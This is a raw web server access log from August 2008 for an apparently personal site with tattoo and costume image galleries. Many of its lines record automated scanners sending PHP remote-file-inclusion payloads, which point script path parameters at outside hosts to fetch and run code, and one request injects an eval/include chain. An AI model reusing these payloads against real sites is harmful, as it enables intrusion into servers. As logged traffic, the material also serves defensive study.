64.22.89.194 - - [21/Aug/2008:21:06:39 -0500] "GET /logs/lib/gore.php?libpath=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:21:06:39 -0500] "GET /logs/lib/gore.php?libpath=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:21:06:39 -0500] "GET /lib/gore.php?libpath=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:21:06:39 -0500] "GET /lib/gore.php?libpath=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.812"
203.211.131.132 - - [21/Aug/2008:21:07:04 -0500] "GET /logs/access_log.1214438400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
62.231.161.4 - - [21/Aug/2008:21:07:27 -0500] "GET /logs/access_log.1214179200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.64"
203.211.131.132 - - [21/Aug/2008:21:07:34 -0500] "GET /logs/access_log.1214524800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.810"
216.75.35.118 - - [21/Aug/2008:21:08:51 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
216.75.35.118 - - [21/Aug/2008:21:08:52 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:21:09:17 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
216.75.35.118 - - [21/Aug/2008:21:09:17 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.75.35.118 - - [21/Aug/2008:21:09:18 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:21:11:40 -0500] "GET /logs/access_log.1214179200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://utilz.info/a4? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
72.29.68.128 - - [21/Aug/2008:21:12:27 -0500] "GET //login.php?dir=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.29.68.128 - - [21/Aug/2008:21:12:27 -0500] "GET /logs/access_log.1206230400//login.php?dir=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.29.68.128 - - [21/Aug/2008:21:12:27 -0500] "GET /logs/access_log.1201564800//login.php?dir=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.29.68.128 - - [21/Aug/2008:21:12:27 -0500] "GET /logs//login.php?dir=http://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.75.35.118 - - [21/Aug/2008:21:12:47 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
216.75.35.118 - - [21/Aug/2008:21:12:47 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
64.22.89.194 - - [21/Aug/2008:21:13:00 -0500] "GET /logs/access_log.1211500800/classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:21:13:00 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
64.22.89.194 - - [21/Aug/2008:21:13:00 -0500] "GET /logs/classes/adodbt/sql.php?classes_dir=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
75.69.246.191 - - [21/Aug/2008:21:14:12 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
75.69.246.191 - - [21/Aug/2008:21:14:16 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
62.231.161.4 - - [21/Aug/2008:21:14:58 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.64"
195.39.5.203 - - [21/Aug/2008:21:16:08 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.39.5.203 - - [21/Aug/2008:21:16:09 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.231.161.4 - - [21/Aug/2008:21:16:33 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.tsw.ru/ips.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.64"
75.85.187.165 - - [21/Aug/2008:21:17:16 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:17:16 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:17:16 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:17:17 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
217.133.215.166 - - [21/Aug/2008:21:17:19 -0500] "GET /logs/access_log.1205539200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.133.215.166 - - [21/Aug/2008:21:17:20 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.133.215.166 - - [21/Aug/2008:21:17:20 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.85.187.165 - - [21/Aug/2008:21:17:21 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
202.181.99.47 - - [21/Aug/2008:21:17:56 -0500] "GET /logs/access_log.1214438400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://utilz.info/a4? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:21:17:57 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://utilz.info/a4? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
202.181.99.47 - - [21/Aug/2008:21:17:57 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://utilz.info/a4? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
72.52.143.147 - - [21/Aug/2008:21:17:58 -0500] "GET /inc/functions.inc.php?config[ppa_root_path]=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
72.52.143.147 - - [21/Aug/2008:21:17:58 -0500] "GET /logs/inc/functions.inc.php?config[ppa_root_path]=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
75.85.187.165 - - [21/Aug/2008:21:17:59 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:17:59 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:17:59 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:17:59 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:18:00 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
195.39.5.203 - - [21/Aug/2008:21:18:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.133.215.166 - - [21/Aug/2008:21:19:06 -0500] "GET /logs/access_log.1206144000//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.elettrostudio.ch/fr/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.211.131.132 - - [21/Aug/2008:21:19:09 -0500] "GET /logs/access_log.1213401600//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
195.39.5.203 - - [21/Aug/2008:21:19:27 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.39.5.203 - - [21/Aug/2008:21:19:28 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
75.85.187.165 - - [21/Aug/2008:21:19:55 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:55 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:55 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:19:56 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
76.193.17.57 - - [21/Aug/2008:21:20:30 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_designer""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.193.17.57 - - [21/Aug/2008:21:20:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.193.17.57 - - [21/Aug/2008:21:20:32 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.193.17.57 - - [21/Aug/2008:21:20:32 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.193.17.57 - - [21/Aug/2008:21:20:32 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
76.193.17.57 - - [21/Aug/2008:21:20:33 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18"
72.52.143.147 - - [21/Aug/2008:21:20:47 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 324 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.52.143.147 - - [21/Aug/2008:21:20:47 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
195.39.5.203 - - [21/Aug/2008:21:20:55 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
195.39.5.203 - - [21/Aug/2008:21:20:55 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
75.85.187.165 - - [21/Aug/2008:21:21:07 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:07 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:07 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:21:08 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
62.169.0.50 - - [21/Aug/2008:21:21:44 -0500] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
62.169.0.50 - - [21/Aug/2008:21:21:45 -0500] "GET /phpSecurePages/secure.php?&cfgProgDir=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
75.85.187.165 - - [21/Aug/2008:21:22:31 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:31 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:32 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:22:33 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
212.150.247.23 - - [21/Aug/2008:21:23:16 -0500] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
212.150.247.23 - - [21/Aug/2008:21:23:16 -0500] "GET /phpSecurePages/secure.php?&cfgProgDir=http://xposurexplosion.com/.../rid???? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
203.211.131.132 - - [21/Aug/2008:21:23:23 -0500] "GET /logs/access_log.1214524800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
82.194.76.177 - - [21/Aug/2008:21:23:46 -0500] "GET //?custompluginfile[]=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
82.194.76.177 - - [21/Aug/2008:21:23:47 -0500] "GET /logs//?custompluginfile[]=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 200 96221 "-""libwww-perl/5.805"
75.85.187.165 - - [21/Aug/2008:21:24:17 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:24:17 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.85.187.165 - - [21/Aug/2008:21:24:18 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
